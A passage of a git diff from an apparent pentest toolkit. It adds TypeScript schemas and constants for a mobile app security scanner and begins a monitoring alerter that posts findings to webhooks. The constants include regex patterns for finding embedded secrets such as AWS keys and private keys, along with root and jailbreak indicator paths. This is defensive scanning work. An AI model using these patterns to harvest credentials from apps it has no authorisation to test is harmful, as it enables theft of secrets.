+    "M7", // Insufficient Binary Protections
+    "M8", // Security Misconfiguration
+    "M9", // Insecure Data Storage
+    "M10", // Insufficient Cryptography
+  ])
+  export type OwaspMobile = z.infer<typeof OwaspMobile>
+
+  /**
+   * Android permission protection levels.
+   */
+  export const PermissionProtection = z.enum(["normal", "dangerous", "signature", "signatureOrSystem"])
+  export type PermissionProtection = z.infer<typeof PermissionProtection>
+
+  /**
+   * Android component types.
+   */
+  export const ComponentType = z.enum(["activity", "service", "receiver", "provider"])
+  export type ComponentType = z.infer<typeof ComponentType>
+
+  /**
+   * Secret types.
+   */
+  export const SecretType = z.enum([
+    "api_key",
+    "aws_key",
+    "gcp_key",
+    "azure_key",
+    "firebase_key",
+    "google_maps_key",
+    "private_key",
+    "jwt_secret",
+    "oauth_secret",
+    "database_credential",
+    "encryption_key",
+    "generic_secret",
+  ])
+  export type SecretType = z.infer<typeof SecretType>
+
+  // ============================================
+  // Mobile App Types
+  // ============================================
+
+  /**
+   * Mobile application.
+   */
+  export const MobileApp = z.object({
+    id: z.string(),
+    sessionID: z.string().optional(),
+    platform: Platform,
+    name: z.string(),
+    packageName: z.string(), // com.example.app or bundle ID
+    version: z.string(),
+    versionCode: z.number().optional(), // Android versionCode
+    buildNumber: z.string().optional(), // iOS build number
+    minSdkVersion: z.number().optional(), // Android minimum SDK
+    targetSdkVersion: z.number().optional(), // Android target SDK
+    minOSVersion: z.string().optional(), // iOS minimum version
+    filePath: z.string(),
+    fileHash: z.string(), // SHA-256
+    size: z.number(),
+    analyzedAt: z.number(),
+    signatureInfo: z
+      .object({
+        signer: z.string().optional(),
+        algorithm: z.string().optional(),
+        validFrom: z.number().optional(),
+        validTo: z.number().optional(),
+        debuggable: z.boolean().optional(),
+      })
+      .optional(),
+  })
+  export type MobileApp = z.infer<typeof MobileApp>
+
+  // ============================================
+  // Android Types
+  // ============================================
+
+  /**
+   * Android permission.
+   */
+  export const AndroidPermission = z.object({
+    name: z.string(),
+    protection: PermissionProtection,
+    granted: z.boolean().default(true),
+    description: z.string().optional(),
+    risk: Severity.optional(),
+    customPermission: z.boolean().default(false),
+  })
+  export type AndroidPermission = z.infer<typeof AndroidPermission>
+
+  /**
+   * Intent filter.
+   */
+  export const IntentFilter = z.object({
+    actions: z.array(z.string()).default([]),
+    categories: z.array(z.string()).default([]),
+    dataSchemes: z.array(z.string()).default([]),
+    dataHosts: z.array(z.string()).default([]),
+    dataPaths: z.array(z.string()).default([]),
+    dataMimeTypes: z.array(z.string()).default([]),
+    priority: z.number().optional(),
+  })
+  export type IntentFilter = z.infer<typeof IntentFilter>
+
+  /**
+   * Android component.
+   */
+  export const AndroidComponent = z.object({
+    name: z.string(),
+    type: ComponentType,
+    exported: z.boolean(),
+    permission: z.string().optional(),
+    intentFilters: z.array(IntentFilter).default([]),
+    enabled: z.boolean().default(true),
+    processName: z.string().optional(),
+    launchMode: z.string().optional(), // For activities
+    taskAffinity: z.string().optional(),
+    allowTaskReparenting: z.boolean().optional(),
+    excludeFromRecents: z.boolean().optional(),
+    // Content provider specific
+    authorities: z.string().optional(),
+    grantUriPermissions: z.boolean().optional(),
+    readPermission: z.string().optional(),
+    writePermission: z.string().optional(),
+    pathPermissions: z
+      .array(
+        z.object({
+          path: z.string(),
+          type: z.enum(["path", "pathPrefix", "pathPattern"]),
+          readPermission: z.string().optional(),
+          writePermission: z.string().optional(),
+        })
+      )
+      .optional(),
+  })
+  export type AndroidComponent = z.infer<typeof AndroidComponent>
+
+  /**
+   * Android manifest.
+   */
+  export const AndroidManifest = z.object({
+    packageName: z.string(),
+    versionCode: z.number(),
+    versionName: z.string(),
+    minSdkVersion: z.number(),
+    targetSdkVersion: z.number(),
+    compileSdkVersion: z.number().optional(),
+    permissions: z.array(AndroidPermission).default([]),
+    activities: z.array(AndroidComponent).default([]),
+    services: z.array(AndroidComponent).default([]),
+    receivers: z.array(AndroidComponent).default([]),
+    providers: z.array(AndroidComponent).default([]),
+    usesFeatures: z.array(z.string()).default([]),
+    usesLibraries: z.array(z.string()).default([]),
+    allowBackup: z.boolean().default(true),
+    debuggable: z.boolean().default(false),
+    usesCleartextTraffic: z.boolean().optional(),
+    networkSecurityConfig: z.string().optional(),
+    extractNativeLibs: z.boolean().optional(),
+    largeHeap: z.boolean().optional(),
+    supportsRtl: z.boolean().optional(),
+    sharedUserId: z.string().optional(),
+    mainActivity: z.string().optional(),
+    applicationLabel: z.string().optional(),
+  })
+  export type AndroidManifest = z.infer<typeof AndroidManifest>
+
+  /**
+   * Network security configuration (Android).
+   */
+  export const NetworkSecurityConfig = z.object({
+    cleartextTrafficPermitted: z.boolean().default(false),
+    trustAnchors: z.array(z.string()).default([]),
+    pinnedDomains: z
+      .array(
+        z.object({
+          domain: z.string(),
+          includeSubdomains: z.boolean().default(false),
+          pins: z.array(z.string()).default([]),
+          pinExpiration: z.string().optional(),
+        })
+      )
+      .default([]),
+    debugOverrides: z.boolean().default(false),
+    domainConfigs: z
+      .array(
+        z.object({
+          domain: z.string(),
+          includeSubdomains: z.boolean().default(false),
+          cleartextTrafficPermitted: z.boolean().optional(),
+          trustAnchors: z.array(z.string()).optional(),
+        })
+      )
+      .default([]),
+  })
+  export type NetworkSecurityConfig = z.infer<typeof NetworkSecurityConfig>
+
+  // ============================================
+  // iOS Types
+  // ============================================
+
+  /**
+   * App Transport Security settings.
+   */
+  export const ATSSettings = z.object({
+    allowsArbitraryLoads: z.boolean().default(false),
+    allowsArbitraryLoadsForMedia: z.boolean().default(false),
+    allowsArbitraryLoadsInWebContent: z.boolean().default(false),
+    allowsLocalNetworking: z.boolean().default(false),
+    exceptionDomains: z
+      .record(
+        z.string(),
+        z.object({
+          includesSubdomains: z.boolean().optional(),
+          allowsInsecureHTTPLoads: z.boolean().optional(),
+          requiresForwardSecrecy: z.boolean().optional(),
+          minimumTLSVersion: z.string().optional(),
+        })
+      )
+      .default({}),
+  })
+  export type ATSSettings = z.infer<typeof ATSSettings>
+
+  /**
+   * iOS Info.plist.
+   */
+  export const IOSPlist = z.object({
+    bundleId: z.string(),
+    bundleName: z.string(),
+    bundleDisplayName: z.string().optional(),
+    version: z.string(), // CFBundleShortVersionString
+    buildVersion: z.string(), // CFBundleVersion
+    minOSVersion: z.string(),
+    deviceFamily: z.array(z.number()).default([]), // 1=iPhone, 2=iPad
+    atsSettings: ATSSettings.optional(),
+    urlSchemes: z.array(z.string()).default([]),
+    queriedUrlSchemes: z.array(z.string()).default([]),
+    backgroundModes: z.array(z.string()).default([]),
+    usageDescriptions: z.record(z.string(), z.string()).default({}),
+    capabilities: z.array(z.string()).default([]),
+    appGroups: z.array(z.string()).default([]),
+    associatedDomains: z.array(z.string()).default([]),
+    documentTypes: z.array(z.string()).default([]),
+    exportedTypes: z.array(z.string()).default([]),
+    supportedInterfaceOrientations: z.array(z.string()).default([]),
+  })
+  export type IOSPlist = z.infer<typeof IOSPlist>
+
+  /**
+   * iOS entitlements.
+   */
+  export const IOSEntitlements = z.object({
+    teamId: z.string().optional(),
+    appId: z.string().optional(),
+    getTaskAllow: z.boolean().optional(), // Debug entitlement
+    keychainAccessGroups: z.array(z.string()).default([]),
+    appGroups: z.array(z.string()).default([]),
+    associatedDomains: z.array(z.string()).default([]),
+    pushNotifications: z.boolean().optional(),
+    apsEnvironment: z.string().optional(), // development or production
+    networkExtensions: z.array(z.string()).default([]),
+    appTransportSecurity: z.record(z.string(), z.unknown()).optional(),
+    healthKit: z.boolean().optional(),
+    homeKit: z.boolean().optional(),
+    siri: z.boolean().optional(),
+    applePay: z.boolean().optional(),
+    cloudKit: z.boolean().optional(),
+    icloud: z.boolean().optional(),
+    inAppPurchase: z.boolean().optional(),
+    gameCenter: z.boolean().optional(),
+    dataProtection: z.string().optional(),
+    customEntitlements: z.record(z.string(), z.unknown()).default({}),
+  })
+  export type IOSEntitlements = z.infer<typeof IOSEntitlements>
+
+  /**
+   * iOS binary protections.
+   */
+  export const BinaryProtections = z.object({
+    pie: z.boolean(), // Position Independent Executable
+    arc: z.boolean(), // Automatic Reference Counting
+    stackCanary: z.boolean(), // Stack protection
+    nx: z.boolean().optional(), // No-Execute stack
+    encrypted: z.boolean().optional(),
+    codeSignature: z.boolean().optional(),
+    restrictSegment: z.boolean().optional(),
+    rpath: z.boolean().optional(),
+    symbols: z.boolean().optional(), // Symbol table stripped
+    bitcode: z.boolean().optional(),
+  })
+  export type BinaryProtections = z.infer<typeof BinaryProtections>
+
+  // ============================================
+  // Common Analysis Types
+  // ============================================
+
+  /**
+   * Code location.
+   */
+  export const CodeLocation = z.object({
+    file: z.string(),
+    line: z.number().optional(),
+    column: z.number().optional(),
+    snippet: z.string().optional(),
+    className: z.string().optional(),
+    methodName: z.string().optional(),
+  })
+  export type CodeLocation = z.infer<typeof CodeLocation>
+
+  /**
+   * Extracted secret.
+   */
+  export const ExtractedSecret = z.object({
+    id: z.string(),
+    type: SecretType,
+    value: z.string(),
+    maskedValue: z.string(), // Partially masked for display
+    location: CodeLocation,
+    confidence: z.enum(["high", "medium", "low"]),
+    entropy: z.number().optional(),
+    pattern: z.string().optional(), // Regex that matched
+    context: z.string().optional(), // Surrounding code context
+    validated: z.boolean().optional(), // Whether secret was validated
+  })
+  export type ExtractedSecret = z.infer<typeof ExtractedSecret>
+
+  /**
+   * Extracted URL.
+   */
+  export const ExtractedURL = z.object({
+    id: z.string(),
+    url: z.string(),
+    scheme: z.string(),
+    host: z.string(),
+    port: z.number().optional(),
+    path: z.string().optional(),
+    location: CodeLocation,
+    isHttps: z.boolean(),
+    isInternal: z.boolean().optional(), // Internal/development URL
+    hasCredentials: z.boolean().optional(), // Contains embedded credentials
+  })
+  export type ExtractedURL = z.infer<typeof ExtractedURL>
+
+  /**
+   * SSL pinning detection result.
+   */
+  export const SSLPinningResult = z.object({
+    detected: z.boolean(),
+    implementation: z.string().optional(), // e.g., "OkHttp", "TrustKit", "custom"
+    pinnedDomains: z.array(z.string()).default([]),
+    locations: z.array(CodeLocation).default([]),
+    bypassable: z.boolean().optional(),
+    notes: z.string().optional(),
+  })
+  export type SSLPinningResult = z.infer<typeof SSLPinningResult>
+
+  /**
+   * Root/jailbreak detection result.
+   */
+  export const RootDetectionResult = z.object({
+    detected: z.boolean(),
+    methods: z.array(z.string()).default([]), // Detection methods found
+    locations: z.array(CodeLocation).default([]),
+    bypassable: z.boolean().optional(),
+    strength: z.enum(["strong", "medium", "weak"]).optional(),
+  })
+  export type RootDetectionResult = z.infer<typeof RootDetectionResult>
+
+  /**
+   * Obfuscation analysis result.
+   */
+  export const ObfuscationResult = z.object({
+    detected: z.boolean(),
+    tool: z.string().optional(), // e.g., "ProGuard", "R8", "DexGuard"
+    strength: z.enum(["strong", "medium", "weak", "none"]),
+    stringEncryption: z.boolean().optional(),
+    controlFlowObfuscation: z.boolean().optional(),
+    classRenaming: z.boolean().optional(),
+    methodRenaming: z.boolean().optional(),
+    resourceObfuscation: z.boolean().optional(),
+  })
+  export type ObfuscationResult = z.infer<typeof ObfuscationResult>
+
+  /**
+   * Third-party library.
+   */
+  export const ThirdPartyLibrary = z.object({
+    name: z.string(),
+    version: z.string().optional(),
+    category: z.string().optional(), // e.g., "analytics", "ads", "networking"
+    hasKnownVulnerabilities: z.boolean().optional(),
+    vulnerabilities: z.array(z.string()).default([]),
+    license: z.string().optional(),
+    outdated: z.boolean().optional(),
+    latestVersion: z.string().optional(),
+  })
+  export type ThirdPartyLibrary = z.infer<typeof ThirdPartyLibrary>
+
+  // ============================================
+  // Finding Types
+  // ============================================
+
+  /**
+   * Mobile finding.
+   */
+  export const MobileFinding = z.object({
+    id: z.string(),
+    scanId: z.string(),
+    appId: z.string(),
+    platform: Platform,
+    title: z.string(),
+    description: z.string(),
+    severity: Severity,
+    owaspMobile: OwaspMobile,
+    category: z.string(), // Subcategory within OWASP
+    component: z.string().optional(), // Activity, Service, etc.
+    codeLocation: CodeLocation.optional(),
+    evidence: z.string().optional(),
+    recommendation: z.string(),
+    references: z.array(z.string()).default([]),
+    cwe: z.string().optional(), // CWE ID
+    cvss: z.number().optional(),
+    falsePositive: z.boolean().default(false),
+    verified: z.boolean().default(false),
+    detectedAt: z.number(),
+  })
+  export type MobileFinding = z.infer<typeof MobileFinding>
+
+  // ============================================
+  // Scan Options Types
+  // ============================================
+
+  /**
+   * Static analysis options.
+   */
+  export const StaticAnalysisOptions = z.object({
+    manifest: z.boolean().default(true),
+    permissions: z.boolean().default(true),
+    components: z.boolean().default(true),
+    network: z.boolean().default(true),
+    crypto: z.boolean().default(true),
+    storage: z.boolean().default(true),
+    secrets: z.boolean().default(true),
+    sslPinning: z.boolean().default(true),
+    rootDetection: z.boolean().default(true),
+    obfuscation: z.boolean().default(true),
+    libraries: z.boolean().default(true),
+    urls: z.boolean().default(true),
+  })
+  export type StaticAnalysisOptions = z.infer<typeof StaticAnalysisOptions>
+
+  /**
+   * Decompilation options.
+   */
+  export const DecompileOptions = z.object({
+    enabled: z.boolean().default(false),
+    outputDir: z.string().optional(),
+    decompileResources: z.boolean().default(true),
+    decompileSources: z.boolean().default(true),
+    cleanupOnComplete: z.boolean().default(true),
+  })
+  export type DecompileOptions = z.infer<typeof DecompileOptions>
+
+  /**
+   * External tool options.
+   */
+  export const ExternalToolOptions = z.object({
+    apktool: z.boolean().default(true),
+    jadx: z.boolean().default(false),
+    mobsf: z.boolean().default(false),
+    mobsfUrl: z.string().optional(),
+    mobsfApiKey: z.string().optional(),
+    androguard: z.boolean().default(false),
+    frida: z.boolean().default(false),
+    objection: z.boolean().default(false),
+  })
+  export type ExternalToolOptions = z.infer<typeof ExternalToolOptions>
+
+  /**
+   * Scan profile.
+   */
+  export const ScanProfile = z.object({
+    id: ProfileId,
+    name: z.string(),
+    description: z.string(),
+    staticAnalysis: StaticAnalysisOptions,
+    decompile: DecompileOptions,
+    externalTools: ExternalToolOptions,
+    timeout: z.number().default(300000), // 5 minutes default
+    maxFileSize: z.number().default(500 * 1024 * 1024), // 500MB default
+  })
+  export type ScanProfile = z.infer<typeof ScanProfile>
+
+  // ============================================
+  // Scan Result Types
+  // ============================================
+
+  /**
+   * Permission analysis result.
+   */
+  export const PermissionAnalysis = z.object({
+    total: z.number(),
+    dangerous: z.number(),
+    normal: z.number(),
+    signature: z.number(),
+    custom: z.number(),
+    highRisk: z.array(z.string()).default([]),
+    unusualCombinations: z.array(z.string()).default([]),
+    recommendations: z.array(z.string()).default([]),
+  })
+  export type PermissionAnalysis = z.infer<typeof PermissionAnalysis>
+
+  /**
+   * Network security analysis result.
+   */
+  export const NetworkSecurityAnalysis = z.object({
+    cleartextAllowed: z.boolean(),
+    sslPinning: SSLPinningResult.optional(),
+    insecureConnections: z.array(z.string()).default([]),
+    certificateValidation: z.boolean().optional(),
+    customTrustManagers: z.array(CodeLocation).default([]),
+    webViewSettings: z
+      .object({
+        javascriptEnabled: z.boolean().optional(),
+        allowFileAccess: z.boolean().optional(),
+        allowContentAccess: z.boolean().optional(),
+        domStorageEnabled: z.boolean().optional(),
+      })
+      .optional(),
+  })
+  export type NetworkSecurityAnalysis = z.infer<typeof NetworkSecurityAnalysis>
+
+  /**
+   * Crypto analysis result.
+   */
+  export const CryptoAnalysis = z.object({
+    weakAlgorithms: z.array(z.string()).default([]),
+    hardcodedKeys: z.array(CodeLocation).default([]),
+    insecureRandom: z.array(CodeLocation).default([]),
+    ecbMode: z.array(CodeLocation).default([]),
+    staticIV: z.array(CodeLocation).default([]),
+    md5Usage: z.array(CodeLocation).default([]),
+    sha1Usage: z.array(CodeLocation).default([]),
+    properImplementations: z.array(z.string()).default([]),
+  })
+  export type CryptoAnalysis = z.infer<typeof CryptoAnalysis>
+
+  /**
+   * Storage analysis result.
+   */
+  export const StorageAnalysis = z.object({
+    sharedPreferences: z
+      .object({
+        found: z.boolean(),
+        worldReadable: z.boolean().optional(),
+        worldWritable: z.boolean().optional(),
+        sensitiveData: z.array(z.string()).default([]),
+      })
+      .optional(),
+    sqlite: z
+      .object({
+        found: z.boolean(),
+        encrypted: z.boolean().optional(),
+        hardcodedQueries: z.array(CodeLocation).default([]),
+      })
+      .optional(),
+    externalStorage: z
+      .object({
+        used: z.boolean(),
+        sensitiveData: z.array(z.string()).default([]),
+      })
+      .optional(),
+    logging: z
+      .object({
+        sensitiveLogging: z.array(CodeLocation).default([]),
+      })
+      .optional(),
+    keychain: z
+      .object({
+        // iOS specific
+        found: z.boolean(),
+        accessControl: z.string().optional(),
+        biometricProtected: z.boolean().optional(),
+      })
+      .optional(),
+    clipboard: z
+      .object({
+        sensitiveData: z.array(CodeLocation).default([]),
+      })
+      .optional(),
+  })
+  export type StorageAnalysis = z.infer<typeof StorageAnalysis>
+
+  /**
+   * Scan statistics.
+   */
+  export const ScanStats = z.object({
+    filesAnalyzed: z.number().default(0),
+    classesAnalyzed: z.number().default(0),
+    methodsAnalyzed: z.number().default(0),
+    stringsExtracted: z.number().default(0),
+    urlsExtracted: z.number().default(0),
+    secretsFound: z.number().default(0),
+    findingsTotal: z.number().default(0),
+    findingsBySeverity: z
+      .object({
+        critical: z.number().default(0),
+        high: z.number().default(0),
+        medium: z.number().default(0),
+        low: z.number().default(0),
+        info: z.number().default(0),
+      })
+      .default({ critical: 0, high: 0, medium: 0, low: 0, info: 0 }),
+    findingsByOwasp: z.record(OwaspMobile, z.number()).optional(),
+    duration: z.number().default(0),
+  })
+  export type ScanStats = z.infer<typeof ScanStats>
+
+  /**
+   * Mobile scan result.
+   */
+  export const MobileScanResult = z.object({
+    id: z.string(),
+    appId: z.string(),
+    app: MobileApp,
+    profile: ProfileId,
+    platform: Platform,
+    status: Status,
+    findings: z.array(MobileFinding).default([]),
+    manifest: z.union([AndroidManifest, IOSPlist]).optional(),
+    entitlements: IOSEntitlements.optional(),
+    permissions: PermissionAnalysis.optional(),
+    networkSecurity: NetworkSecurityAnalysis.optional(),
+    cryptoAnalysis: CryptoAnalysis.optional(),
+    storageAnalysis: StorageAnalysis.optional(),
+    binaryProtections: BinaryProtections.optional(),
+    obfuscation: ObfuscationResult.optional(),
+    rootDetection: RootDetectionResult.optional(),
+    secrets: z.array(ExtractedSecret).default([]),
+    urls: z.array(ExtractedURL).default([]),
+    libraries: z.array(ThirdPartyLibrary).default([]),
+    stats: ScanStats,
+    startTime: z.number(),
+    endTime: z.number().optional(),
+    error: z.string().optional(),
+    outputDir: z.string().optional(),
+  })
+  export type MobileScanResult = z.infer<typeof MobileScanResult>
+
+  // ============================================
+  // External Tool Output Types
+  // ============================================
+
+  /**
+   * MobSF scan result.
+   */
+  export const MobSFResult = z.object({
+    file_name: z.string(),
+    app_name: z.string(),
+    package_name: z.string(),
+    version_name: z.string(),
+    version_code: z.string().optional(),
+    min_sdk: z.string().optional(),
+    target_sdk: z.string().optional(),
+    md5: z.string(),
+    sha1: z.string(),
+    sha256: z.string(),
+    size: z.string(),
+    security_score: z.number().optional(),
+    permissions: z.record(z.string(), z.unknown()).optional(),
+    manifest_analysis: z.array(z.unknown()).optional(),
+    code_analysis: z.record(z.string(), z.unknown()).optional(),
+    binary_analysis: z.array(z.unknown()).optional(),
+    urls: z.array(z.string()).optional(),
+    emails: z.array(z.string()).optional(),
+    firebase_urls: z.array(z.string()).optional(),
+  })
+  export type MobSFResult = z.infer<typeof MobSFResult>
+
+  // ============================================
+  // Constants
+  // ============================================
+
+  /**
+   * OWASP Mobile Top 10 2024 descriptions.
+   */
+  export const OWASP_MOBILE_2024: Record<OwaspMobile, { title: string; description: string }> = {
+    M1: {
+      title: "Improper Credential Usage",
+      description: "Hardcoded credentials, insecure key storage, credential leakage",
+    },
+    M2: {
+      title: "Inadequate Supply Chain Security",
+      description: "Third-party library vulnerabilities, outdated dependencies",
+    },
+    M3: {
+      title: "Insecure Authentication/Authorization",
+      description: "Weak authentication, missing session management, improper authorization",
+    },
+    M4: {
+      title: "Insufficient Input/Output Validation",
+      description: "Input validation failures, SQL injection, XSS vulnerabilities",
+    },
+    M5: {
+      title: "Insecure Communication",
+      description: "Missing SSL pinning, cleartext traffic, weak TLS",
+    },
+    M6: {
+      title: "Inadequate Privacy Controls",
+      description: "Excessive permissions, data leakage, privacy violations",
+    },
+    M7: {
+      title: "Insufficient Binary Protections",
+      description: "Missing PIE, no obfuscation, debug enabled, code tampering",
+    },
+    M8: {
+      title: "Security Misconfiguration",
+      description: "Backup enabled, debug mode, exported components, insecure defaults",
+    },
+    M9: {
+      title: "Insecure Data Storage",
+      description: "Cleartext storage, unencrypted databases, insecure shared preferences",
+    },
+    M10: {
+      title: "Insufficient Cryptography",
+      description: "Weak algorithms, hardcoded keys, improper key management",
+    },
+  }
+
+  /**
+   * Dangerous Android permissions.
+   */
+  export const DANGEROUS_PERMISSIONS = [
+    "android.permission.READ_CALENDAR",
+    "android.permission.WRITE_CALENDAR",
+    "android.permission.CAMERA",
+    "android.permission.READ_CONTACTS",
+    "android.permission.WRITE_CONTACTS",
+    "android.permission.GET_ACCOUNTS",
+    "android.permission.ACCESS_FINE_LOCATION",
+    "android.permission.ACCESS_COARSE_LOCATION",
+    "android.permission.ACCESS_BACKGROUND_LOCATION",
+    "android.permission.RECORD_AUDIO",
+    "android.permission.READ_PHONE_STATE",
+    "android.permission.READ_PHONE_NUMBERS",
+    "android.permission.CALL_PHONE",
+    "android.permission.ANSWER_PHONE_CALLS",
+    "android.permission.READ_CALL_LOG",
+    "android.permission.WRITE_CALL_LOG",
+    "android.permission.ADD_VOICEMAIL",
+    "android.permission.USE_SIP",
+    "android.permission.PROCESS_OUTGOING_CALLS",
+    "android.permission.BODY_SENSORS",
+    "android.permission.ACTIVITY_RECOGNITION",
+    "android.permission.SEND_SMS",
+    "android.permission.RECEIVE_SMS",
+    "android.permission.READ_SMS",
+    "android.permission.RECEIVE_WAP_PUSH",
+    "android.permission.RECEIVE_MMS",
+    "android.permission.READ_EXTERNAL_STORAGE",
+    "android.permission.WRITE_EXTERNAL_STORAGE",
+    "android.permission.ACCESS_MEDIA_LOCATION",
+  ]
+
+  /**
+   * API key patterns for detection.
+   */
+  export const API_KEY_PATTERNS: Array<{ type: SecretType; pattern: RegExp; description: string }> = [
+    {
+      type: "aws_key",
+      pattern: /AKIA[0-9A-Z]{16}/,
+      description: "AWS Access Key ID",
+    },
+    {
+      type: "aws_key",
+      pattern: /[A-Za-z0-9/+=]{40}/,
+      description: "AWS Secret Access Key",
+    },
+    {
+      type: "gcp_key",
+      pattern: /AIza[0-9A-Za-z_-]{35}/,
+      description: "Google Cloud API Key",
+    },
+    {
+      type: "firebase_key",
+      pattern: /AIza[0-9A-Za-z_-]{35}/,
+      description: "Firebase API Key",
+    },
+    {
+      type: "google_maps_key",
+      pattern: /AIza[0-9A-Za-z\\-_]{35}/,
+      description: "Google Maps API Key",
+    },
+    {
+      type: "private_key",
+      pattern: /-----BEGIN\s*(?:RSA|DSA|EC|OPENSSH)?\s*PRIVATE KEY-----/,
+      description: "Private Key",
+    },
+    {
+      type: "jwt_secret",
+      pattern: /eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*/,
+      description: "JWT Token",
+    },
+    {
+      type: "oauth_secret",
+      pattern: /[0-9a-zA-Z_-]{24,}/,
+      description: "OAuth Secret",
+    },
+    {
+      type: "api_key",
+      pattern: /[A-Za-z0-9_-]{32,}/,
+      description: "Generic API Key",
+    },
+  ]
+
+  /**
+   * Weak crypto algorithms.
+   */
+  export const WEAK_CRYPTO_ALGORITHMS = [
+    "DES",
+    "3DES",
+    "RC2",
+    "RC4",
+    "MD4",
+    "MD5",
+    "SHA1",
+    "SHA-1",
+    "ECB",
+    "PKCS1Padding",
+  ]
+
+  /**
+   * Root detection indicators (Android).
+   */
+  export const ROOT_DETECTION_INDICATORS = [
+    "/system/app/Superuser.apk",
+    "/system/xbin/su",
+    "/system/bin/su",
+    "/sbin/su",
+    "/data/local/xbin/su",
+    "/data/local/bin/su",
+    "/data/local/su",
+    "com.noshufou.android.su",
+    "com.thirdparty.superuser",
+    "eu.chainfire.supersu",
+    "com.koushikdutta.superuser",
+    "com.topjohnwu.magisk",
+    "test-keys",
+    "/system/app/SuperSU",
+  ]
+
+  /**
+   * Jailbreak detection indicators (iOS).
+   */
+  export const JAILBREAK_DETECTION_INDICATORS = [
+    "/Applications/Cydia.app",
+    "/Applications/FakeCarrier.app",
+    "/Applications/Icy.app",
+    "/Applications/IntelliScreen.app",
+    "/Applications/MxTube.app",
+    "/Applications/RockApp.app",
+    "/Applications/SBSettings.app",
+    "/Applications/WinterBoard.app",
+    "/Applications/blackra1n.app",
+    "/Library/MobileSubstrate/MobileSubstrate.dylib",
+    "/Library/MobileSubstrate/DynamicLibraries",
+    "/bin/bash",
+    "/bin/sh",
+    "/usr/sbin/sshd",
+    "/usr/libexec/ssh-keysign",
+    "/usr/sbin/frida-server",
+    "/etc/apt",
+    "/private/var/lib/apt",
+    "/private/var/lib/cydia",
+    "/private/var/stash",
+    "cydia://",
+  ]
+}
diff --git a/packages/opencode/src/pentest/monitoring/alerter.ts b/packages/opencode/src/pentest/monitoring/alerter.ts
new file mode 100644
index 00000000000..17bbcc22810
--- /dev/null
+++ b/packages/opencode/src/pentest/monitoring/alerter.ts
@@ -0,0 +1,203 @@
+/**
+ * @fileoverview Alerter
+ *
+ * Alert handling for monitoring events.
+ *
+ * @module pentest/monitoring/alerter
+ */
+
+import { Log } from "../../util/log"
+import { Bus } from "../../bus"
+import { PentestTypes } from "../types"
+import type { Monitor, MonitorRun } from "./types"
+import { MonitoringEvents } from "./events"
+import { DiffEngine } from "./diff"
+
+const log = Log.create({ service: "pentest.monitoring.alerter" })
+
+// Track last alert time per monitor to enforce cooldown
+const lastAlertTime = new Map<string, number>()
+
+/**
+ * Alerter namespace for sending monitoring alerts.
+ */
+export namespace Alerter {
+  /**
+   * Send alert for new findings.
+   *
+   * @param monitor - Monitor configuration
+   * @param run - Current run record
+   * @param allFindings - All findings from this run
+   */
+  export async function sendNewFindingsAlert(
+    monitor: Monitor,
+    run: MonitorRun,
+    allFindings: PentestTypes.Finding[]
+  ): Promise<void> {
+    if (!monitor.alerts.enabled) return
+
+    // Check cooldown
+    const lastAlert = lastAlertTime.get(monitor.id) || 0
+    if (Date.now() - lastAlert < monitor.alerts.cooldownMs) {
+      log.info("Alert cooldown active, skipping", { monitorID: monitor.id })
+      return
+    }
+
+    // Filter to new findings only
+    const newFindings = allFindings.filter((f) => run.newFindingIDs.includes(f.id))
+
+    // Filter by minimum severity
+    const alertableFindings = DiffEngine.filterBySeverity(newFindings, monitor.alerts.minSeverity)
+
+    if (alertableFindings.length === 0) {
+      log.info("No findings meet alert criteria", { monitorID: monitor.id })
+      return
+    }
+
+    // Calculate summary
+    const summary = DiffEngine.summarizeSeverity(alertableFindings)
+
+    log.info("Sending new vulnerabilities alert", {
+      monitorID: monitor.id,
+      newFindings: summary.total,
+    })
+
+    // Send to configured channels
+    for (const channel of monitor.alerts.channels) {
+      switch (channel) {
+        case "bus":
+          Bus.publish(MonitoringEvents.NewVulnerabilitiesDetected, {
+            monitorID: monitor.id,
+            monitorName: monitor.name,
+            runID: run.id,
+            findings: alertableFindings.map((f) => ({
+              id: f.id,
+              title: f.title,
+              severity: f.severity,
+              target: f.target,
+              port: f.port,
+            })),
+            summary,
+          })
+          break
+
+        case "log":
+          log.warn("NEW VULNERABILITIES DETECTED", {
+            monitor: monitor.name,
+            summary,
+            findings: alertableFindings.map((f) => ({
+              title: f.title,
+              severity: f.severity,
+              target: f.target,
+            })),
+          })
+          break
+
+        case "webhook":
+          if (monitor.alerts.webhookUrl) {
+            await sendWebhook(monitor.alerts.webhookUrl, {
+              type: "new_vulnerabilities",
+              monitor: { id: monitor.id, name: monitor.name },
+              run: { id: run.id, number: run.runNumber },
+              findings: alertableFindings.map((f) => ({
+                id: f.id,
+                title: f.title,
+                severity: f.severity,
+                target: f.target,
+                port: f.port,
+                description: f.description,
+              })),
+              summary,
+              timestamp: Date.now(),
+            })
+          }
+          break
+      }
+    }
+
+    lastAlertTime.set(monitor.id, Date.now())
+  }
+
+  /**
+   * Send alert for resolved findings.
+   *
+   * @param monitor - Monitor configuration
+   * @param run - Current run record
+   */
+  export async function sendResolvedAlert(monitor: Monitor, run: MonitorRun): Promise<void> {
+    if (!monitor.alerts.enabled) return
+    if (run.resolvedFindingIDs.length === 0) return
+
+    Bus.publish(MonitoringEvents.VulnerabilitiesResolved, {
+      monitorID: monitor.id,
+      monitorName: monitor.name,
+      runID: run.id,
+      resolvedCount: run.resolvedFindingIDs.length,
+      resolvedIDs: run.resolvedFindingIDs,
+    })
+
+    log.info("Vulnerabilities resolved", {
+      monitorID: monitor.id,
+      resolvedCount: run.resolvedFindingIDs.length,
+    })
+
+    // Send webhook if configured
+    if (monitor.alerts.channels.includes("webhook") && monitor.alerts.webhookUrl) {
+      await sendWebhook(monitor.alerts.webhookUrl, {
+        type: "vulnerabilities_resolved",
+        monitor: { id: monitor.id, name: monitor.name },
+        run: { id: run.id, number: run.runNumber },
+        resolvedCount: run.resolvedFindingIDs.length,
+        resolvedIDs: run.resolvedFindingIDs,
+        timestamp: Date.now(),
+      })
+    }
+  }
+
+  /**
+   * Send webhook notification.
+   */
+  async function sendWebhook(url: string, payload: unknown): Promise<void> {
+    try {
+      const response = await fetch(url, {
+        method: "POST",
+        headers: {
+          "Content-Type": "application/json",
+          "User-Agent": "cyxwiz-monitoring/1.0",
+        },
+        body: JSON.stringify(payload),
+      })
+
+      if (!response.ok) {
+        log.error("Webhook delivery failed", {
+          url,
+          status: response.status,
+          statusText: response.statusText,
+        })
+      } else {
+        log.info("Webhook delivered", { url, status: response.status })
+      }
+    } catch (error) {
